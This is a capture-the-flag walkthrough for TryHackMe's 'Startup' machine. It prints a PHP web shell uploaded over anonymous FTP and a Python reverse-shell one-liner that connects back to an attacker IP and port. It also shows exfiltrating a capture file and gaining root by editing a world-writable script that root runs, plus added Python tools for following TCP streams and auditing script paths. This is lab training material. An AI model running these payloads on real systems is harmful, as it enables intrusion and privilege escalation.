Link: https://tryhackme.com/room/startup
Enumeration
Nmap
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
FTP
With the anonymous user I can list and download the files from the server.
I tested uploading a file to the FTP server in the /ftp directory and it worked!
Port 80
Looking at the website we see no spice!
Some quick enumeration shows a /files path that is accessible, with similar contents to the FTP directory.
Rce
Let’s test RCE next with a simple shell.
Upload a PHP shell to the FTP server. Keep the PHP inside single quotes: in a double-quoted string the shell expands $_GET to nothing before it ever reaches the file.
echo '<?php system($_GET["cmd"]); ?>' > file.php
ftp IP
cd ftp
put file.php
exit
Now visit the files directory and check that the file is there.
Nice, next test RCE by passing a command in the cmd parameter.
Nice, it’s working, let’s upgrade to a better shell.
Replace IP and PORT with your own and start a listener on that port first. The payload contains spaces, quotes and parentheses, which are not valid in a raw URL, so let the browser percent-encode it (or encode it yourself).
http://10.10.193.7/files/ftp/file.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
We’re on! Time to enumerate a bit…
Going to the root / directory we find some interesting files…
$ cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
Then we find a folder called incidents containing a suspicious.pcapng file.
I copy this over to my machine for further analysis.
# On the target, in the incidents folder
python3 -m http.server 8899
# On your machine
wget http://TARGET_IP:8899/suspicious.pcapng
Then open the file in Wireshark:
wireshark suspicious.pcapng
Right-click a packet and select Follow > TCP Stream.
Then cycle through the streams with the stream-number arrows in the follow dialog.
A few streams in we can see someone getting a reverse shell too, and some more juicy info.
Using this new info we can log in to the main account ‘lennie’.
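Follow > TCP Stream is easy to script when a capture is too big to click through. The block below is an added example, not part of the original writeup: a minimal pcapng reader (Enhanced Packet Blocks only, little-endian section) that reassembles the payload of each TCP connection in capture order and marks which side sent what. The capture it reads is constructed inline, including a reverse-shell-style exchange and an unrelated HTTP request, so it runs offline; the addresses, prompt text and the names `make_pcapng`, `tcp_segment` and `follow_streams` are mine. Point `follow_streams` at the bytes of a real file to use it on suspicious.pcapng.

```python
import struct
from collections import defaultdict

# ---- constructed pcapng writer: only here so the parser below has something to read ----
def _block(btype, body):
    """Generic pcapng block: type, total length, body padded to 4 bytes, total length."""
    body += b"\x00" * (-len(body) % 4)
    total = 12 + len(body)
    return struct.pack("<II", btype, total) + body + struct.pack("<I", total)

def _frame(src, sport, dst, dport, payload):
    """Ethernet + IPv4 + TCP (PSH/ACK) frame; checksums and sequence numbers are zero."""
    eth = b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload

def make_pcapng(frames):
    """Section Header Block, one Ethernet Interface Description Block, one EPB per frame."""
    shb = _block(0x0A0D0D0A, struct.pack("<IHHq", 0x1A2B3C4D, 1, 0, -1))
    idb = _block(0x00000001, struct.pack("<HHI", 1, 0, 65535))  # linktype 1 = Ethernet
    epbs = b"".join(_block(0x00000006, struct.pack("<IIIII", 0, 0, i, len(f), len(f)) + f)
                    for i, f in enumerate(frames))
    return shb + idb + epbs

# ---- reader: the part you would run against a real capture ------------------------------
def iter_packets(capture):
    """Yield the raw frame from every Enhanced Packet Block, skipping all other blocks."""
    off = 0
    while off + 12 <= len(capture):
        btype, total = struct.unpack_from("<II", capture, off)
        if btype == 0x00000006:
            caplen = struct.unpack_from("<I", capture, off + 20)[0]
            yield capture[off + 28:off + 28 + caplen]
        off += total

def tcp_segment(frame):
    """(src, sport, dst, dport, payload) for an IPv4/TCP Ethernet frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0F) * 4
    ip_total = struct.unpack_from("!H", frame, 16)[0]
    tcp = frame[14 + ihl:14 + ip_total]
    sport, dport = struct.unpack_from("!HH", tcp)
    doff = (tcp[12] >> 4) * 4
    src = ".".join(map(str, frame[26:30]))
    dst = ".".join(map(str, frame[30:34]))
    return src, sport, dst, dport, tcp[doff:]

def follow_streams(capture):
    """Wireshark's Follow > TCP Stream, scripted: group payloads by connection in capture
    order, prefixing '>' for data from the side that spoke first and '<' for replies."""
    streams, first = defaultdict(list), {}
    for frame in iter_packets(capture):
        seg = tcp_segment(frame)
        if seg is None or not seg[4]:
            continue
        src, sport, dst, dport, payload = seg
        key = tuple(sorted([(src, sport), (dst, dport)]))
        first.setdefault(key, (src, sport))
        arrow = ">" if (src, sport) == first[key] else "<"
        streams[key].append(arrow + payload.decode("latin-1"))
    return dict(streams)

# Constructed endpoints: the box connecting back to a listener, plus a browser hitting port 80.
VICTIM, ATTACKER = ("10.10.193.7", 50123), ("10.0.2.15", 4444)
BROWSER, WEB = ("10.0.2.15", 51000), ("10.10.193.7", 80)

def sample_capture():
    """Constructed capture: a reverse-shell conversation interleaved with an HTTP request."""
    return make_pcapng([
        _frame(*VICTIM, *ATTACKER, b"www-data@startup:/$ "),
        _frame(*BROWSER, *WEB, b"GET /files/ HTTP/1.1\r\nHost: startup\r\n\r\n"),
        _frame(*ATTACKER, *VICTIM, b"id\n"),
        _frame(*VICTIM, *ATTACKER, b"uid=33(www-data) gid=33(www-data)\n"),
    ])

if __name__ == "__main__":
    for n, (key, lines) in enumerate(follow_streams(sample_capture()).items()):
        print(f"--- stream {n}: {key[0]} <-> {key[1]}")
        print("".join(lines))
```

Anything typed into an interactive shell shows up in the `<` lines one keystroke or one line at a time, which is exactly where a password entered over the reverse shell would appear.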
User
Now we can log in as lennie and get the user flag.
Root
Looking at the files in lennie’s folder reveals some interesting things, like a script and a startup list.
And in lennie’s Documents folder we can see a few more files of interest.
Looks like a few hints on what to put into the list file, maybe? Let’s try a few things.
From planner.sh we can see a call to another file:
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
Checking the permissions on /etc/print.sh shows rwx for everyone. That’s weird: the w means we should have write access.
nano /etc/print.sh
Sure enough, we do! Time to get root.
Whatever we put in /etc/print.sh runs with the privileges of whoever runs planner.sh, so check who that is before editing: look at the owner of the files planner.sh writes (ls -l /home/lennie/scripts). If startup_list.txt is owned by root, something is running planner.sh as root, and the command we put into print.sh will run as root too. Put a command that gives you a shell (for example a reverse shell back to a listener) into print.sh and wait for the next run of planner.sh to get a root shell :)
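The check above, written as a small audit script. This is an added example, not code from the writeup or the room: it lists every absolute path a shell script touches, tells you whether the script executes that path or only writes to it, and reports owner, mode and whether the current user can write it. The temp-dir replica of planner.sh and print.sh in `demo`, and the names `classify_paths`, `audit` and `hijackable`, are mine; python3 is available on the box since the reverse shell above used it.

```python
import os
import pwd
import re
import stat
import tempfile

# Absolute paths made of ordinary filename characters, not preceded by a word char or '/'.
ABS_PATH = re.compile(r"(?<![\w/])/(?:[\w.-]+/)*[\w.-]+")

def classify_paths(script_text):
    """Map every absolute path a shell script mentions to how it is used.

    'exec' = the path sits in command position, so the script runs it;
    'ref'  = it appears elsewhere (redirect target, argument)."""
    uses = {}
    for line in script_text.splitlines():
        code = line.split("#", 1)[0].strip()  # drops comments and the shebang line
        if not code:
            continue
        for p in ABS_PATH.findall(code):
            how = "exec" if code.startswith(p) else "ref"
            if uses.get(p) != "exec":  # an exec use wins over a later ref use
                uses[p] = how
    return uses

def owner(path):
    uid = os.stat(path).st_uid
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)

def audit(script_path):
    """For each existing path the script touches: use, owner, mode and whether we can
    write it. A writable 'exec' entry is the privesc (whoever runs the script runs our
    code); the owner of the 'ref' files it writes hints at who that is."""
    with open(script_path) as fh:
        uses = classify_paths(fh.read())
    report = {}
    for p, how in uses.items():
        if os.path.exists(p):
            report[p] = {"use": how, "owner": owner(p),
                         "mode": stat.filemode(os.stat(p).st_mode),
                         "writable": os.access(p, os.W_OK)}
    return report

def hijackable(report):
    """Paths the script executes that the current user can overwrite."""
    return sorted(p for p, r in report.items() if r["use"] == "exec" and r["writable"])

def demo():
    """Constructed replica of lennie's setup in a temp dir: planner.sh calls a
    world-writable print.sh and writes startup_list.txt."""
    d = tempfile.mkdtemp()
    print_sh, planner = os.path.join(d, "print.sh"), os.path.join(d, "planner.sh")
    with open(print_sh, "w") as fh:
        fh.write("#!/bin/bash\necho 'hi'\n")
    os.chmod(print_sh, 0o777)
    with open(planner, "w") as fh:
        fh.write(f"#!/bin/bash\necho $LIST > {d}/startup_list.txt\n{print_sh}\n")
    open(os.path.join(d, "startup_list.txt"), "w").close()
    return audit(planner)

if __name__ == "__main__":
    rep = demo()
    for p, r in rep.items():
        print(f"{r['mode']} {r['owner']:10} {r['use']:4} {p}")
    print("hijackable:", hijackable(rep))
```

On the real box, run `audit("/home/lennie/scripts/planner.sh")`: print.sh should show up as exec and writable, and the owner column of startup_list.txt tells you which account planner.sh runs as.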